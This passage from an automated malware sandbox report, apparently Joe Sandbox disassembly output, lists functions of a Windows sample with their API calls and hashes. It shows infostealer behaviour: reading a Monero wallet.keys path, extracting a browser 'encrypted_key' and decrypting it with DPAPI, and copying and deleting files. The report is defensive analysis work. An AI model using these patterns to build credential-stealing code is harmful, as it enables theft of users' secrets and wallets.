                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: fb405a01e81ba53251b016149c2ea164eefcc8dc180a6cd4bec05d195abc9d4f
                              • Instruction ID: 1bc8b290c38fbf7a5a19a108cc2073ce6f91e19f8795707a4caa0bb6cfa5f96a
                              • Opcode Fuzzy Hash: fb405a01e81ba53251b016149c2ea164eefcc8dc180a6cd4bec05d195abc9d4f
                              • Instruction Fuzzy Hash: AA910F728501089BEB14FBA0DC92FEE7339EF94304F514568F507A61A2EF346A49CB66
                              Function 0093D780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                                • Part of subcall function 0094A9B0: lstrlen.KERNEL32(?,010F8A98,?,\Monero\wallet.keys,00950E17), ref: 0094A9C5
                                • Part of subcall function 0094A9B0: lstrcpy.KERNEL32(00000000), ref: 0094AA04
                                • Part of subcall function 0094A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0094AA12
                                • Part of subcall function 0094A8A0: lstrcpy.KERNEL32(?,00950E17), ref: 0094A905
                                • Part of subcall function 00948B60: GetSystemTime.KERNEL32(00950E1A,010F9920,009505AE,?,?,009313F9,?,0000001A,00950E1A,00000000,?,010F8A98,?,\Monero\wallet.keys,00950E17), ref: 00948B86
                                • Part of subcall function 0094A920: lstrcpy.KERNEL32(00000000,?), ref: 0094A972
                                • Part of subcall function 0094A920: lstrcat.KERNEL32(00000000), ref: 0094A982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0093D801
                              • lstrlen.KERNEL32(00000000), ref: 0093D99F
                              • lstrlen.KERNEL32(00000000), ref: 0093D9B3
                              • DeleteFileA.KERNEL32(00000000), ref: 0093DA32
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: 1b7dd4a382ef6cfae66dddd7f90f34e29a31e255d67c86d084ce9504b3b6341a
                              • Instruction ID: fbdb468f545a2bdcb400c4a9bbb7eecfb2339c081e41fa46790f462b5c6731ad
                              • Opcode Fuzzy Hash: 1b7dd4a382ef6cfae66dddd7f90f34e29a31e255d67c86d084ce9504b3b6341a
                              • Instruction Fuzzy Hash: 698111729501089BEB04FBA0DC96FEE7339EF94304F514518F407A71A2EF346A49CB66
                              Function 00943560 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen
                              • String ID:
                              • API String ID: 367037083-0
                              • Opcode ID: db9de390c7b219edfd3bf82083ffd5c90eb19670c462fabef9694cb0a23a2020
                              • Instruction ID: ea4d03739acc02c9b9f41a16bc4ee2b3df76877e8c3966a8e47755afc668df90
                              • Opcode Fuzzy Hash: db9de390c7b219edfd3bf82083ffd5c90eb19670c462fabef9694cb0a23a2020
                              • Instruction Fuzzy Hash: 96412D71D10109ABDB14EFB5D896EEEB778AB84304F108418E41667291DB75AA09CFA2
                              Function 00939CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                                • Part of subcall function 009399C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009399EC
                                • Part of subcall function 009399C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00939A11
                                • Part of subcall function 009399C0: LocalAlloc.KERNEL32(00000040,?), ref: 00939A31
                                • Part of subcall function 009399C0: ReadFile.KERNEL32(000000FF,?,00000000,0093148F,00000000), ref: 00939A5A
                                • Part of subcall function 009399C0: LocalFree.KERNEL32(0093148F), ref: 00939A90
                                • Part of subcall function 009399C0: CloseHandle.KERNEL32(000000FF), ref: 00939A9A
                                • Part of subcall function 00948E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00948E52
                              • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00939D39
                                • Part of subcall function 00939AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00934EEE,00000000,00000000), ref: 00939AEF
                                • Part of subcall function 00939AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00934EEE,00000000,?), ref: 00939B01
                                • Part of subcall function 00939AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00934EEE,00000000,00000000), ref: 00939B2A
                                • Part of subcall function 00939AC0: LocalFree.KERNEL32(?,?,?,?,00934EEE,00000000,?), ref: 00939B3F
                                • Part of subcall function 00939B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00939B84
                                • Part of subcall function 00939B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00939BA3
                                • Part of subcall function 00939B60: LocalFree.KERNEL32(?), ref: 00939BD3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                              • String ID: $"encrypted_key":"$DPAPI
                              • API String ID: 2100535398-738592651
                              • Opcode ID: 58e78a3ac16cb172c4c80ad30f4c1eb017e8a80813a1169a7a729943a6157acd
                              • Instruction ID: c8af3f5e1b60a800a4001ba392221c013c42f2e19d46624277c1566ef8eb8968
                              • Opcode Fuzzy Hash: 58e78a3ac16cb172c4c80ad30f4c1eb017e8a80813a1169a7a729943a6157acd
                              • Instruction Fuzzy Hash: 833100B6D10109ABDB14DFE4DC86FEFB7B8AB88304F144519F915A7281EB749A04CFA1
                              Function 009492E0 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON
                              Download Yara Rule
                              APIs
                              • CreateFileA.KERNEL32(00943AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,00943AEE,?), ref: 009492FC
                              • GetFileSizeEx.KERNEL32(000000FF,00943AEE), ref: 00949319
                              • CloseHandle.KERNEL32(000000FF), ref: 00949327
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$CloseCreateHandleSize
                              • String ID:
                              • API String ID: 1378416451-0
                              • Opcode ID: ef42410a7879e723c8f79b48d3151d7b1230e55b37d4124f9445c0fd5232a3ad
                              • Instruction ID: d2d04edd7850801fd55890d072ec87c89f1bd51c93827dd2ec9e282dfeea4a8f
                              • Opcode Fuzzy Hash: ef42410a7879e723c8f79b48d3151d7b1230e55b37d4124f9445c0fd5232a3ad
                              • Instruction Fuzzy Hash: 2DF04935E44208BBDF24DFB0DC59F9E77B9AB88721F10C654BA55A72C0DA74AB418B40
                              Function 0094C742 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              • __getptd.LIBCMT ref: 0094C74E
                                • Part of subcall function 0094BF9F: __amsg_exit.LIBCMT ref: 0094BFAF
                              • __getptd.LIBCMT ref: 0094C765
                              • __amsg_exit.LIBCMT ref: 0094C773
                              • __updatetlocinfoEx_nolock.LIBCMT ref: 0094C797
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                              • String ID:
                              • API String ID: 300741435-0
                              • Opcode ID: 80401290d4cc76de7a9f88ceee617eec47897d6f070137cc60a8d4c92559f34c
                              • Instruction ID: 97f6e0c038feaa8d3a2f1dc1cf9558e3241c10059a3c46d65a2f39de8c19853f
                              • Opcode Fuzzy Hash: 80401290d4cc76de7a9f88ceee617eec47897d6f070137cc60a8d4c92559f34c
                              • Instruction Fuzzy Hash: 08F0E9729467009FD760BBB85807F5D33E06F80721F204289F408B71D3DF6499419F56
                              Function 00944F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00948DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00948E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 00944F7A
                              • lstrcat.KERNEL32(?,00951070), ref: 00944F97
                              • lstrcat.KERNEL32(?,010F8A58), ref: 00944FAB
                              • lstrcat.KERNEL32(?,00951074), ref: 00944FBD
                                • Part of subcall function 00944910: wsprintfA.USER32 ref: 0094492C
                                • Part of subcall function 00944910: FindFirstFileA.KERNEL32(?,?), ref: 00944943
                                • Part of subcall function 00944910: StrCmpCA.SHLWAPI(?,00950FDC), ref: 00944971
                                • Part of subcall function 00944910: StrCmpCA.SHLWAPI(?,00950FE0), ref: 00944987
                                • Part of subcall function 00944910: FindNextFileA.KERNEL32(000000FF,?), ref: 00944B7D
                                • Part of subcall function 00944910: FindClose.KERNEL32(000000FF), ref: 00944B92
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                              • String ID:
                              • API String ID: 2667927680-0
                              • Opcode ID: 99af37382bc856fed5ff505e336e5e22b0d15b767e91d8794ee8a65bea79cf54
                              • Instruction ID: 6897405cb2b751e8a4ac20f59f37660cd5fcfee5163cfc1a7de3ce104b277973
                              • Opcode Fuzzy Hash: 99af37382bc856fed5ff505e336e5e22b0d15b767e91d8794ee8a65bea79cf54
                              • Instruction Fuzzy Hash: 4B21987690020867C794FBB0DC46FEE333DABD4701F004554B65D93191EE74AAC88B93